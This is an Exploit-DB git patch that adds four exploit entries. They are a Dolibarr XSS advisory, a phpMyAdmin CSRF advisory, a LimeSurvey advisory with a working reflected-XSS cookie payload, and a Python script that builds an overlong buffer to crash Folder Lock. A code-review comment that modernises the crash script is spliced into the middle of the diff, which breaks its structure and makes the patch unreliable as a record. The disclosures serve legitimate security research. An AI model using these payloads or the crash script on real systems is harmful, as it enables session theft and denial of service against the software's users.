From d15414605278981d1671ca53a5903eb4e40d28e6 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Sat, 14 Sep 2019 05:02:28 +0000
Subject: [PATCH] DB: 2019-09-14
4 changes to exploits/shellcodes
Folder Lock 7.7.9 - Denial of Service
Dolibarr ERP-CRM 10.0.1 - 'User-Agent' Cross-Site Scripting
phpMyAdmin 4.9.0.1 - Cross-Site Request Forgery
LimeSurvey 3.17.13 - Cross-Site Scripting
---
 exploits/php/webapps/47384.txt | 20 +++++
 exploits/php/webapps/47385.txt | 79 ++++++++++++++++++
 exploits/php/webapps/47386.txt | 146 +++++++++++++++++++++++++++++++++
 exploits/windows/dos/47383.py | 28 +++++++
 files_exploits.csv | 4 +
 5 files changed, 277 insertions(+)
 create mode 100644 exploits/php/webapps/47384.txt
 create mode 100644 exploits/php/webapps/47385.txt
 create mode 100644 exploits/php/webapps/47386.txt
 create mode 100755 exploits/windows/dos/47383.py
diff --git a/exploits/php/webapps/47384.txt b/exploits/php/webapps/47384.txt
new file mode 100644
index 000000000..809c4c654
--- /dev/null
+++ b/exploits/php/webapps/47384.txt
@@ -0,0 +1,20 @@
+# Exploit Title: Dolibarr ERP/CRM 10.0.1 - User-Agent Http Header Cross
+Site Scripting
+# Exploit Author: Metin Yunus Kandemir (kandemir)
+# Vendor Homepage: https://www.dolibarr.org/
+# Software Link: https://www.dolibarr.org/downloads
+# Version: 10.0.1
+# Category: Webapps
+# Tested on: Xampp for Linux
+# CVE: CVE-2019-16197
+# Software Description : Dolibarr ERP & CRM is a modern and easy to use
+software package to manage your business...
+==================================================================
+
+Description: In htdocs/societe/card.php in Dolibarr 10.0.1, the value of
+the User-Agent HTTP header is copied into the HTML document as plain text
+between tags, leading to XSS.
+
+GET /dolibarr-10.0.1/htdocs/societe/card.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0ab
\ No newline at end of file
diff --git a/exploits/php/webapps/47385.txt b/exploits/php/webapps/47385.txt
new file mode 100644
index 000000000..eb2a82d0e
--- /dev/null
+++ b/exploits/php/webapps/47385.txt
@@ -0,0 +1,79 @@
+=============================================
+MGC ALERT 2019-003
+- Original release date: June 13, 2019
+- Last revised: September 13, 2019
+- Discovered by: Manuel Garcia Cardenas
+- Severity: 4,3/10 (CVSS Base Score)
+- CVE-ID: CVE-2019-12922
+=============================================
+
+I. VULNERABILITY
+-------------------------
+phpMyAdmin 4.9.0.1 - Cross-Site Request Forgery
+
+II. BACKGROUND
+-------------------------
+phpMyAdmin is a free software tool written in PHP, intended to handle the
+administration of MySQL over the Web. phpMyAdmin supports a wide range of
+operations on MySQL and MariaDB.
+
+III. DESCRIPTION
+-------------------------
+Has been detected a Cross-Site Request Forgery in phpMyAdmin, that allows
+an attacker to trigger a CSRF attack against a phpMyAdmin user deleting any
+server in the Setup page.
+
+IV. PROOF OF CONCEPT
+-------------------------
+Exploit CSRF - Deleting main server
+
+

Deleting Server 1

+
+
+V. BUSINESS IMPACT
+-------------------------
+The attacker can easily create a fake hyperlink containing the request that
+wants to execute on behalf the user,in this way making possible a CSRF
+attack due to the wrong use of HTTP method.
+
+VI. SYSTEMS AFFECTED
+-------------------------
+phpMyAdmin <= 4.9.0.1
+
+VII. SOLUTION
+-------------------------
+Implement in each call the validation of the token variable, as already
+done in other phpMyAdmin requests.
+
+VIII. REFERENCES
+-------------------------
+https://www.phpmyadmin.net/
+
+IX. CREDITS
+-------------------------
+This vulnerability has been discovered and reported
+by Manuel Garcia Cardenas (advidsec (at) gmail (dot) com).
+
+X. REVISION HISTORY
+-------------------------
+June 13, 2019 1: Initial release
+September 13, 2019 2: Last revision
+
+XI. DISCLOSURE TIMELINE
+-------------------------
+June 13, 2019 1: Vulnerability acquired by Manuel Garcia Cardenas
+June 13, 2019 2: Send to vendor
+July 16, 2019 3: New request to vendor without fix date
+September 13, 2019 4: Sent to lists
+
+XII. LEGAL NOTICES
+-------------------------
+The information contained within this advisory is supplied "as-is" with no
+warranties or guarantees of fitness of use or otherwise.
+
+XIII. ABOUT
+-------------------------
+Manuel Garcia Cardenas
+Pentester
\ No newline at end of file
diff --git a/exploits/php/webapps/47386.txt b/exploits/php/webapps/47386.txt
new file mode 100644
index 000000000..33e0fe015
--- /dev/null
+++ b/exploits/php/webapps/47386.txt
@@ -0,0 +1,146 @@
+SEC Consult Vulnerability Lab Security Advisory < 20190912-0 >
+=======================================================================
+ title: Stored and reflected XSS vulnerabilities
+ product: LimeSurvey
+ vulnerable version: <= 3.17.13
+ fixed version: =>3.17.14
+ CVE number: CVE-2019-16172, CVE-2019-16173
+ impact: medium
+ homepage: https://www.limesurvey.org/
+ found: 2019-08-23
+ by: Andreas Kolbeck (Office Munich)
+ David Haintz (Office Vienna)
+ SEC Consult Vulnerability Lab
+
+ An integrated part of SEC Consult
+ Europe | Asia | North America
+
+ https://www.sec-consult.com
+
+=======================================================================
+
+Vendor description:
+-------------------
+"LimeSurvey is the tool to use for your online surveys. Whether you are
+conducting simple questionnaires with just a couple of questions or advanced
+assessments with conditionals and quota management, LimeSurvey has got you
+covered. LimeSurvey is 100% open source and will always be transparently developed.
+We can help you reach your goals."
+
+Source: https://www.limesurvey.org/
+
+
+Business recommendation:
+------------------------
+LimeSurvey suffered from a vulnerability due to improper input
+and output validation. By exploiting this vulnerability an attacker could:
+ 1. Attack other users of the web application with JavaScript code,
+ browser exploits or Trojan horses, or
+ 2. perform unauthorized actions in the name of another logged-in user.
+
+The vendor provides a patch which should be installed immediately.
+Furthermore, a thorough security analysis is highly recommended as only a
+short spot check has been performed and additional issues are to be expected.
+
+
+Vulnerability overview/description:
+-----------------------------------
+1) Stored and reflected XSS vulnerabilities
+LimeSurvey suffers from a stored and reflected cross-site scripting vulnerability,
+which allows an attacker to execute JavaScript code with the permissions of the victim.
+In this way it is possible to escalate privileges from a low-privileged account e.g.
+to "SuperAdmin".
+
+
+Proof of concept:
+-----------------
+1) Stored and reflected XSS vulnerabilities
+Example 1 - Stored XSS (CVE-2019-16172):
+The attacker needs the appropriate permissions in order to create new survey groups.
+Then create a survey group with a JavaScript payload in the title, for example:
+
+test
+
+When the survey group is being deleted, e.g. by an administrative user, the JavaScript
+code will be executed as part of the "success" message.
+
+
+Example 2 - Reflected XSS (CVE-2019-16173):
+The following proof of concept prints the current CSRF token cookie which contains the
+CSRF token. The parameter "surveyid" is not filtered properly:
+
+http://$host/index.php/admin/survey?mandatory=1&sid=xxx&surveyid=xxx%22%3E%3Cimg%20
+src=x%20onerror=%22alert(document.cookie)%22%3E&sa=listquestions&sort=question
+
+
+If the URL schema is configured differently the following payload works:
+http://$host/index.php?r=admin/survey&mandatory=1&sid=xxx&surveyid=
+xxx">&sa=listquestions&sort=question
+
+
+Vulnerable / tested versions:
+-----------------------------
+The vulnerabilities have been verified to exist in version 3.17.9 and the latest
+version 3.17.13. It is assumed that older versions are affected as well.
+
+
+Vendor contact timeline:
+------------------------
+2019-08-29: Contacting vendor through https://bugs.limesurvey.org/view.php?id=15204
+2019-09-02: Fixes available:
+ https://github.com/LimeSurvey/LimeSurvey/commit/32d6a5224327b246ee3a2a08500544e4f80f9a9a
+ https://github.com/LimeSurvey/LimeSurvey/commit/f1c1ad2d24eb262363511fcca2e96ce737064006
+2019-09-02: Release of LimeSurvey v3.17.14 which fixes the security issues
+2019-09-03: Release of LimeSurvey v3.17.15 bug fix
+2019-09-12: Coordinated release of security advisory
+
+
+Solution:
+---------
+Update to version 3.17.15 or higher:
+https://www.limesurvey.org/stable-release
+
+The vendor provides a detailed list of changes here:
+https://www.limesurvey.org/limesurvey-updates/2188-limesurvey-3-17-14-build-190902-released
+
+
+Workaround:
+-----------
+No workaround available.
+
+
+Advisory URL:
+-------------
+https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html
+
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+SEC Consult Vulnerability Lab
+
+SEC Consult
+Europe | Asia | North America
+
+About SEC Consult Vulnerability Lab
+The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
+ensures the continued knowledge gain of SEC Consult in the field of network
+and application security to stay ahead of the attacker. The SEC Consult
+Vulnerability Lab supports high-quality penetration testing and the evaluation
+of new offensive and defensive technologies for our customers. Hence our
+customers obtain the most current information about vulnerabilities and valid
+recommendation about the risk profile of new technologies.
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Interested to work with the experts of SEC Consult?
+Send us your application https://www.sec-consult.com/en/career/index.html
+
+Interested in improving your cyber security with the experts of SEC Consult?
+Contact our local offices https://www.sec-consult.com/en/contact/index.html
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Mail: research at sec-consult dot com
+Web: https://www.sec-consult.com
+Blog: http://blog.sec-consult.com
+Twitter: https://twitter.com/sec_consult
+
+EOF A. Kolbeck / @2019
\ No newline at end of file
diff --git a/exploits/windows/dos/47383.py b/exploits/windows/dos/47383.py
new file mode 100755
index 000000000..ffe7225d9
--- /dev/null
+++ b/exploits/windows/dos/47383.py
@@ -0,0 +1,28 @@
+# Exploit Title: Folder Lock v7.7.9 Denial of Service Exploit
+# Date: 12.09.2019
+# Vendor Homepage:https://www.newsoftwares.net/folderlock/
+# Software Link: https://www.newsoftwares.net/download/folderlock7-en/folder-lock-en.exe
+# Exploit Author: Achilles
+# Tested Version: 7.7.9
+# Tested on: Windows 7 x64
+
+
+# 1.- Run python code :Folder_Lock.py
+# 2.- Open EVIL.txt and copy content to clipboard
+# 3.- Open Folderlock and Click 'Enter Key'
+# 4.- Paste the content of EVIL.txt into the Field: 'Serial Number and Registration Key'
+# 5.- Click 'Submit' and you will see a crash.
+
+
+
+#!/usr/bin/env python
+buffer = "\x41" * 6000
+
+try:
+ f=open("Evil.txt","w")
+ print "[+] Creating %s bytes evil payload.." %len(buffer)
+ f.write(buffer)
+ f.close()
+ print "[+] File created!"
+except:
+ print "File cannot be created"
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 23f895b4a..ccf4e31f6 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
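Review bot: The bare `except:` around the file write in 47383.py hides the real failure (permission denied, read-only directory, even KeyboardInterrupt) behind a fixed message, and when `f.write` raises, the handle opened by `f=open("Evil.txt","w")` is never closed. Wrapping the write in `with open("Evil.txt", "w") as f:` and catching `except OSError as exc:` keeps the error visible and makes the cleanup automatic. The `print "..."` statements are Python 2 syntax, so the script fails with a SyntaxError under the Python 3 that `#!/usr/bin/env python` resolves to on most current systems; `print(...)` calls run on both. The shebang itself is inert on line 18 of the new file — it only takes effect as the very first line — so it should move above the header comments, and step 1 of the instructions names `Folder_Lock.py` while the file is committed as 47383.py.
```python
# … unchanged: header and usage comments …
buffer = "\x41" * 6000

try:
    with open("Evil.txt", "w") as f:
        print("[+] Creating %s bytes evil payload.." % len(buffer))
        f.write(buffer)
    print("[+] File created!")
except OSError as exc:
    print("File cannot be created: %s" % exc)
```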
@@ -6559,6 +6559,7 @@ id,file,description,date,author,type,platform,port
 47328,exploits/windows/dos/47328.py,"VX Search Enterprise 10.4.16 - 'User-Agent' Denial of Service",2019-08-30,"James Chamberlain",dos,windows,
 47381,exploits/windows/dos/47381.txt,"Microsoft DirectWrite - Invalid Read in SplicePixel While Processing OTF Fonts",2019-09-12,"Google Security Research",dos,windows,
 47382,exploits/windows/dos/47382.txt,"Microsoft DirectWrite - Out-of-Bounds Read in sfac_GetSbitBitmap While Processing TTF Fonts",2019-09-12,"Google Security Research",dos,windows,
+47383,exploits/windows/dos/47383.py,"Folder Lock 7.7.9 - Denial of Service",2019-09-13,Achilles,dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -41728,3 +41729,6 @@ id,file,description,date,author,type,platform,port
 47373,exploits/php/webapps/47373.txt,"WordPress Plugin Photo Gallery 1.5.34 - Cross-Site Scripting (2)",2019-09-10,MTK,webapps,php,80
 47379,exploits/java/webapps/47379.py,"AVCON6 systems management platform - OGNL Remote Command Execution",2019-09-11,"Nassim Asrir",webapps,java,
 47380,exploits/hardware/webapps/47380.py,"eWON Flexy - Authentication Bypass",2019-09-11,Photubias,webapps,hardware,
+47384,exploits/php/webapps/47384.txt,"Dolibarr ERP-CRM 10.0.1 - 'User-Agent' Cross-Site Scripting",2019-09-13,"Metin Yunus Kandemir",webapps,php,
+47385,exploits/php/webapps/47385.txt,"phpMyAdmin 4.9.0.1 - Cross-Site Request Forgery",2019-09-13,"Manuel García Cárdenas",webapps,php,80
+47386,exploits/php/webapps/47386.txt,"LimeSurvey 3.17.13 - Cross-Site Scripting",2019-09-13,"SEC Consult",webapps,php,80